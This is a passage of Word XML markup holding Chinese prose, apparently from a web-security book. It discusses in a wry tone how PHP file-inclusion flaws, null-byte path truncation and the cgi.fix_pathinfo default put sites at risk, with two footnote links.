          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="303030"/>
            <w:spacing w:val="-6"/>
            <w:position w:val="8"/>
            <w:sz w:val="12"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，这个功能被文件包含漏洞利用，酿造了无数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>血案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="209" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们知道 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>include/require </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个文件的功能，如果有良好的代码规范，则是安全的， 不会成为漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>这是一个正常的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>语言的功能，只是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>某一群不明真相的小白程序员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>在一个错误的时间、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3088;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,22.05706pt" to="158.16pt,22.05706pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark4" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:bookmarkStart w:name="_bookmark4" w:id="55"/>
        <w:bookmarkEnd w:id="55"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ht</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>tp://www.phpweblog.net/GaRY/archive/2010/12/10/PHP_is_geliavable_now.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="113"/>
        <w:ind w:left="203" w:right="223"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>错误的地点写出了错误的代码，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>某一小撮狡猾的黑客</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>发现了这些错误的代码，从而导致   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>漏洞。这是操作系统的问题，谁叫操作系统在遍历文件路径时会被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>字节截断，谁叫 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="68"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作是以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节为结束符，谁叫程序员写出这么小白的代码，官方文档里已经提醒过了， 关 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么事情，太冤枉了！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="603" w:right="221" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>我也觉得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>挺冤枉的，但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>语言和操作系统也挺冤的，我们就是这么规定的，如之奈何？ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但总得有人来为错误买单，谁买单呢？写出不安全代码的小白程序员？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>！学习过市场营销方面知识的同学应该知道，永远也别指望让最终用户来买单，就像老百姓不应该为政府的错误买单一样（当然在某个神奇的国度除外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。所以必须得有人为这些不</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>是漏洞，但造成了既成事实的错误负责，我们需要有社会责任感的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>owner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很高兴的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方在经历这么多年纠结、折磨、发疯之后，终于勇敢地承担起了这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>责任（我相信这是一个很坎坷的心路历程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，为这场酿成无数惨案的闹剧画上了一个句号。但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们仍然悲观地看到，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>cgi.fix_pathinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>的问题 </w:t>
      </w:r>
      <w:hyperlink w:history="true" w:anchor="_bookmark5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:color w:val="303030"/>
            <w:position w:val="8"/>
            <w:sz w:val="12"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍然没有修改默认配置，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>用默认处于风险中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>官方仍然坚持认为这是一个正常的功能，谁叫小白程序员不认真学习官方文件精神！是啊，无数网站付出惨痛学费的正常功能！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:line style="position:absolute;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3112;mso-wrap-distance-left:0;mso-wrap-distance-right:0" from="14.16pt,129.67601pt" to="158.16pt,129.67601pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
            <v:stroke dashstyle="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:line>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t>是当下用户最多的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发语言之一，但是因为种种历史遗留原因（我认为是历史</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，导致在安全的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>增值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="2"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>服务上做得远远不够</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>相对于一些新兴的流行语言来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-101"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>流行起来的时候，当时的互联网远远没有现在复杂，也远远没有现在这么多的安全问题，在当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>时的历史背景下，很多问题都不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="0"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-64"/>
          <w:w w:val="33"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，只是功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="357" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="356" w:right="0" w:hanging="153"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_bookmark5" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:bookmarkStart w:name="_bookmark5" w:id="57"/>
        <w:bookmarkEnd w:id="57"/>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>ht</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>tp://www.80sec.com/nginx-securit.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
